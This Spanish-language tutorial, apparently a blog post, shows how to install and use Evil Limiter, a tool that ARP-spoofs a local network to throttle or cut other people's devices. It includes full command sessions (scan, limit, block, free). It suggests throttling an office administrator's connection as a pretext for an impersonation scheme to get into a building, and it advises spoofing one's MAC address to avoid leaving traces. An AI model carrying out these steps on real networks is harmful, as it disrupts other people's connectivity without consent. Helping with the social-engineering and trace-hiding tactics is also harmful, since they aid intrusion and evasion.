Z0172CK


EvilLimiter

Controlar el trafico de red con Evil Limiter para acelerar o iniciar dispositivos


Si se encuentra con un compañero de cuarto que acapara el ancho de banda de datos limitado con videojuegos o descubre que un vecino se ha invitado a su red Wi-Fi, puede recuperar fácilmente el control de su acceso a Internet. Evil Limiter hace esto al permitirle controlar la velocidad de bits de cualquier dispositivo en la misma red que usted, lo que le permite reducir o incluso detener la velocidad de transferencia de datos por completo.

En terminos generales, el usuario promedio no tiene mucha visibilidad sobre quien o que hay en su red, por lo que cualquier persona con la contraseña puede ingresar y comenzar a usar el ancho de banda. En otras situaciones, un companero de cuarto o un miembro de la familia puede estar acaparando todo el ancho de banda injustamente para jugar videojuegos o transmitir videos. Algunos enrutadores tienen interfaces web que le permiten establecer límites en cada conexión, pero sin la contraseña del enrutador, es posible que esta opción no sea accesible.

Evil Limiter utiliza la falsificacion de ARP para hacer que los dispositivos envien datos a la computadora atacante en lugar de al enrutador, lo que nos permite enviar los datos al enrutador a la velocidad que deseemos. Gracias a la forma en que funciona el protocolo ARP, es posible controlar la velocidad de cualquier dispositivo en una conexion de red compartida. Sin embargo, debido a que la falsificacion de ARP solo funciona en redes IPv4, esta herramienta no sera efectiva en IPv6 por ahora.

Evil Limiter para Hackers

Para un hacker, Evil Limiter permite una facil orientacion de uno, algunos o todos los dispositivos en una red. Es facil cortar el cable en Internet de un dispositivo en particular en cualquier momento, lo que permite un pretexto conveniente para un ataque de ingenieria social . Si un pirata informatico quisiera acceder a un area exclusiva para empleados, podria identificar el dispositivo de los empleados en el area que desea, y luego limitar la velocidad de su conexion.


En lugar de aparecer sin previo aviso, un pirata informatico podria estrangular la conexion de datos del administrador mientras finge llamar desde la compania de servicios publicos para preguntar si la conexian a Internet ha sido lenta. Cuando el administrador descubre que Internet es realmente lento, el pirata informatico simplemente pide el mejor momento para enviar a alguien a repararlo, dandole un pretexto para ingresar al edificio y evitando que el objetivo llame a la compania de servicios publicos real.

Lo que necesitaras

Para usar Evil Limiter, necesitara un sistema Linux como Kali o Ubuntu con Python3 o superior. Si bien una ventaja poderosa de Evil Limter es que se puede ejecutar en redes incluso cuando no tiene privilegios de administrador, le recomiendo asegurarse de que tiene permiso para ejecutar la herramienta en cualquier red en la que desee probarla.

Evil Limiter usa el paquete ARP para limitar las velocidades de conexion que estan presentes en las redes IPv4, pero no en las redes IPv6. Debido a esto, los sistemas IPv6 estan fuera del alcance de esta herramienta, como se menciono anteriormente.


Instalar EvilLimiter

Para instalar Evil Limiter , solo hay unos pocos comandos para lanzar en una ventana de terminal, como se ve a continuacion. Cuando las bibliotecas necesarias terminen de instalarse, Evil Limiter debe estar instalado y listo para ejecutarse.

                    
                    $ git clone https://github.com/bitbrute/evillimiter.git
                    $ cd evillimiter
                    $ sudo python3 setup.py install
                    
                


Conectando a la red.


Ahora, debera conectarse a su red de destino. Después, puede ejecutar Evil Limiter escribiendo evillimiter en una nueva ventana de terminal. Deberias ver algo como a continuacion.

                    ~# evillimiter

                        ███████╗██╗   ██╗██╗██╗       ██╗     ██╗███╗   ███╗██╗████████╗███████╗██████╗
                        ██╔════╝██║   ██║██║██║       ██║     ██║████╗ ████║██║╚══██╔══╝██╔════╝██╔══██╗
                        █████╗  ██║   ██║██║██║       ██║     ██║██╔████╔██║██║   ██║   █████╗  ██████╔╝
                        ██╔══╝  ╚██╗ ██╔╝██║██║       ██║     ██║██║╚██╔╝██║██║   ██║   ██╔══╝  ██╔══██╗
                        ███████╗ ╚████╔╝ ██║███████╗  ███████╗██║██║ ╚═╝ ██║██║   ██║   ███████╗██║  ██║    
                        ╚══════╝  ╚═══╝  ╚═╝╚══════╝  ╚══════╝╚═╝╚═╝     ╚═╝╚═╝   ╚═╝   ╚══════╝╚═╝  ╚═╝       
                                        by bitbrute  ~  limit devices on your network :3
                                                            v1.1.0
                        
                        OK   interface: wlan0
                        OK   gateway ip: 192.168.5.1
                        OK   gateway mac: 84:██:██:██:██:1a
                        OK   netmask: 255.255.255.0
                        
                        type help or ? to show command information.
                    
                

Si ve esto, Evil Limiter esta instalado, conectado a la red y listo para funcionar.


Ver los comandos disponibles


Puede explorar la funcionalidad de Evil Limiter mirando a traves del sistema de menús y revisando los comandos disponibles. Para hacerlo, escriba un signo de interrogacion en el terminal para abrir la pagina de ayuda.

                (Main) >>> ?

                    scan                          scans for online hosts on your network.
                                                  required to find the hosts you want to limit.
                    
                    hosts                         lists all scanned hosts.
                                                  contains host information, including IDs.
                    
                    limit [ID1,ID2,...] [rate]    limits bandwith of host(s) (uload/dload).
                                                  e.g.: limit 4 100kbit
                                                        limit 2,3,4 1gbit
                                                        limit all 200kbit
                    
                    block [ID1,ID2,...]           blocks internet access of host(s).
                                                  e.g.: block 3,2
                                                        block all
                    
                    free [ID1,ID2,...]            unlimits/unblocks host(s).
                                                  e.g.: free 3
                                                        free all
                    
                    add [IP] (--mac [MAC])        adds custom host to host list.
                                                  mac resolved automatically.
                                                  e.g.: add 192.168.178.24
                                                        add 192.168.1.50 --mac 1c:fc:bc:2d:a6:37
                    
                    clear                         clears the terminal window.
                
            

descubre dispositivos


Como podemos ver arriba, los comandos son sencillos. Para buscar dispositivos en la red, todo lo que necesita hacer es scan.

                
                    (Main) >>> scan

                    100% |██████████████████████████████| 256/256
                    OK   7 hosts discovered.
                
            

La exploracion detendra cualquier otro host en la red. Escriba hosts para mostrarlos a todos.

                
                    (Main) >>> hosts

                    ┌Hosts──────────────┬───────────────────┬──────────┬────────┐
                    │ ID │ IP-Address   │ MAC-Address       │ Hostname │ Status │
                    ├────┼──────────────┼───────────────────┼──────────┼────────┤
                    │ 0  │ 192.168.5.1  │ 84:██:██:██:██:1a │ _gateway │ Free   │
                    │ 1  │ 192.168.5.2  │ 0c:██:██:██:██:f5 │          │ Free   │
                    │ 2  │ 192.168.5.4  │ 3c:██:██:██:██:6f │          │ Free   │
                    │ 3  │ 192.168.5.24 │ 60:██:██:██:██:78 │          │ Free   │
                    │ 4  │ 192.168.5.25 │ c4:██:██:██:██:2b │          │ Free   │
                    │ 5  │ 192.168.5.61 │ 8c:██:██:██:██:f5 │          │ Free   │
                    │ 6  │ 192.168.5.67 │ f0:██:██:██:██:b5 │          │ Free   │
                    └────┴──────────────┴───────────────────┴──────────┴────────┘
                
            

En mi ejemplo, se han descubierto 7 dispositivos en la red, uno de ellos es el enrutador. Ahora tenemos una lista de objetivos con la que podemos bloquear o limitar el acceso, así que probemoslo.

limitar o bloquear dispositivos


Si desea limitar todos los dispositivos excepto el enrutador, puede enumerarlos uno por uno despues del comando de límite . Tambien deberá especificar la velocidad a la que desea limitarlos. En mi caso, ire con 200kbit como la velocidad límite.

Puede usar el comando limit all para elegir todo, pero como desea dejar el enrutador solo, escriba el comando limit 1,2,3,4,5,6 en su lugar para comenzar a limitar esos dispositivos específicos. La cantidad de dispositivos que enumera depende de cuántos haya encontrado.

                
                    (Main) >>> limit 1,2,3,4,5,6 200kbit

                    OK   192.168.5.2 limited to 200kbit.
                    OK   192.168.5.4 limited to 200kbit.
                    OK   192.168.5.24 limited to 200kbit.
                    OK   192.168.5.25 limited to 200kbit.
                    OK   192.168.5.61 limited to 200kbit.
                    OK   192.168.5.67 limited to 200kbit.
                
            

Ahora que hemos limitado algunos dispositivos, tambien podemos seleccionar los dispositivos que queremos bloquear por completo para que no accedan a la red. He descubierto que a veces Evil Limiter puede ser duro mientras se limitan las conexiones, y el resultado es que los dispositivos estan tan limitados que podrían bloquearse.

Para bloquear un dispositivo, escriba el comando block , luego el numero de cualquier dispositivo que desee evitar que reciba datos a traves de la red.

                
                    (Main) >>> block 3

                    OK   192.168.5.24 blocked.
                
            

Prueba con los anfitriones por segunda vez. La mayoria de la red debe estar bloqueada o limitada. hosts

                
                    (Main) >>> hosts

                    ┌Hosts──────────────┬───────────────────┬──────────┬─────────┐
                    │ ID │ IP-Address   │ MAC-Address       │ Hostname │ Status  │
                    ├────┼──────────────┼───────────────────┼──────────┼─────────┤
                    │ 0  │ 192.168.5.1  │ 84:██:██:██:██:1a │ _gateway │ Free    │
                    │ 1  │ 192.168.5.2  │ 0c:██:██:██:██:f5 │          │ Limited │
                    │ 2  │ 192.168.5.4  │ 3c:██:██:██:██:6f │          │ Limited │
                    │ 3  │ 192.168.5.24 │ 60:██:██:██:██:78 │          │ Blocked │
                    │ 4  │ 192.168.5.25 │ c4:██:██:██:██:2b │          │ Limited │
                    │ 5  │ 192.168.5.61 │ 8c:██:██:██:██:f5 │          │ Limited │
                    │ 6  │ 192.168.5.67 │ f0:██:██:██:██:b5 │          │ Limited │
                    └────┴──────────────┴───────────────────┴──────────┴─────────┘
                
            

Restaurar la conexion normal


Ahora que ha causado el caos en la red, es hora de volver a poner las cosas como estaban. Afortunadamente, hacerlo es fácil. Puede optar por restaurar los dispositivos uno por uno o ejecutarlos libremente para deshacer cualquier limitación en los dispositivos de red. con el comando free all

                
                    (Main) >>> free all

                    OK   192.168.5.2 freed.
                    OK   192.168.5.4 freed.
                    OK   192.168.5.24 freed.
                    OK   192.168.5.25 freed.
                    OK   192.168.5.61 freed.
                    OK   192.168.5.67 freed.
                
            

Ejecute hosts por tercera vez, y el acceso a la red debería ser normal nuevamente para todos los dispositivos.

                
                    (Main) >>> hosts

                    ┌Hosts──────────────┬───────────────────┬──────────┬────────┐
                    │ ID │ IP-Address   │ MAC-Address       │ Hostname │ Status │
                    ├────┼──────────────┼───────────────────┼──────────┼────────┤
                    │ 0  │ 192.168.5.1  │ 84:██:██:██:██:1a │ _gateway │ Free   │
                    │ 1  │ 192.168.5.2  │ 0c:██:██:██:██:f5 │          │ Free   │
                    │ 2  │ 192.168.5.4  │ 3c:██:██:██:██:6f │          │ Free   │
                    │ 3  │ 192.168.5.24 │ 60:██:██:██:██:78 │          │ Free   │
                    │ 4  │ 192.168.5.25 │ c4:██:██:██:██:2b │          │ Free   │
                    │ 5  │ 192.168.5.61 │ 8c:██:██:██:██:f5 │          │ Free   │
                    │ 6  │ 192.168.5.67 │ f0:██:██:██:██:b5 │          │ Free   │
                    └────┴──────────────┴───────────────────┴──────────┴────────┘
                
            


Evil Limiter es efectivo pero agresivo


En mis pruebas con Evil Limiter, encontre que era una herramienta extremadamente efectiva, aunque a veces dominante. En ocasiones, mis intentos de limitar un objetivo lo bloquearian por completo, asi que asegurese de probar la efectividad de esta herramienta antes de usarla en cualquier lugar importante.

Una cosa a tener en cuenta cuando se usa Evil Limiter es que la falsificacion de ARP expone su direccion MAC, por lo que el uso de esta herramienta en una red le dice a todos que su direccion MAC es el enrutador. Eso deja su direccion MAC en el caché ARP de cada maquina a la que apunta, así que asegúrese de falsificar su direccion MAC antes de usar esta herramienta si no quiere dejar las huellas digitales de su maquina en toda la red.